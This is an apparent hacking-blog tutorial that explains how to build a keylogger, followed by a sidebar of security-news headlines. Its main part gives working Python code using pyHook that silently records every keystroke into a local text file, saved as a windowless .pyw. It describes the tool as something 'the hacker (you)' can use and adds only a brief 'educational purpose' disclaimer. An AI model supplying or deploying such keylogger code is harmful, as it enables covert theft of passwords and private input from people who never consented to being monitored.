Categories: hackingTechnology

How To Create a Keylogger using Notepad



Create an amazing hacking tool (Keyloggger) just by using Notepad.

A keylogger is a hacking tool of the newbie but sometimes highly skilled hackers also use them. These are very easy to create and use. So, let’s learn how to create our free keylogger.

What is a keylogger?

Before that, it’s important to know what is a keylogger actually(in case you did not already know). It is a program that records your keystrokes and saves them as a log file either onto a server over a reverse TCP tunnel or on the local machine itself. The server, in this case, is the one hosted by the hacker(you).

How To Create Keylogger Using Notepad?

Let’s get started!

1. Open notepad on your computer and paste the following code in it:
import pyHook, pythoncom, sys, logging
# feel free to set the file_log to a different file name/location
file_log = 'keyloggeroutput.txt'
def OnKeyboardEvent(event):
logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s')
chr(event.Ascii)
logging.log(10,chr(event.Ascii))
return True
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()



2. Save the file as keylogger.pyw

3. Fire up your keylogger
Double-click on the file you just created and test it out, then start typing.

When you want to stop logging, open up task manager and kill all the “python” processes. Then look for keyloggeroutput.txt in the same directory were the something.pyw is. Open it up and you should see whatever you typed.

NOTE: You may see some weird looking character if you open it with notepad, those characters means you hit the backspace key.

So this is a simple keylogger that saves the keystrokes on the local machine. You can explore further for more complex keyloggers.

4. Where to go from here?
1. Keylogger Wiki
2. Actual Keylogger for Windows

Also, consider reading the disclaimer before trying it out yourself:
The information provided is for educational purpose only, if a person uses this information for malicious purposes, he/she will be solely responsible for the legal and other consequences.

Abhishek Awasthi

Continuous improvement is better than delayed perfection -Mark Twain.

Recent Posts

  • Laws and Legalities
  • News

Cloudflare requested to expose Showbox, YTS and Popcorn Time site operators

Movie studios obtain subpoena that orders Cloudflare to expose piracy site operators including Showbox, YTS and Popcorn Time site A group…

6 hours ago
  • Laws and Legalities
  • Security news

Mirai botnet masterminds helping FBI to avoid jail time

Mirai botnet creators avoid prison time by assisting FBI as part of their sentencing Remember the three young hackers who…

6 hours ago
  • leak
  • News

Winamp’s new beta version 5.8 leaks online

Winamp 5.8 beta leak surfaces on the web A beta version of the upcoming Winamp 5.8 has been leaked online…

1 day ago
  • Security news
  • Technology

Developer of Terrarium TV says he could hand over user info to authorities

Details of Terrarium TV users could be handed to authorities, developer says Terrarium TV had recently announced that it would be…

1 day ago
  • Explanatory
  • how to

How To Add Bots To Discord Server; Working-2018

Discord is possibly the best cross-platform voice and text chat service for gamers. Well, adding bots to discord server makes…

1 day ago
  • Apple
  • Security news

iOS web attack crashes, causes iPhones or iPads to restart

This new CSS-based web attack can crash and restart iPhones or iPads and can cause a Mac computer to freeze…

2 days ago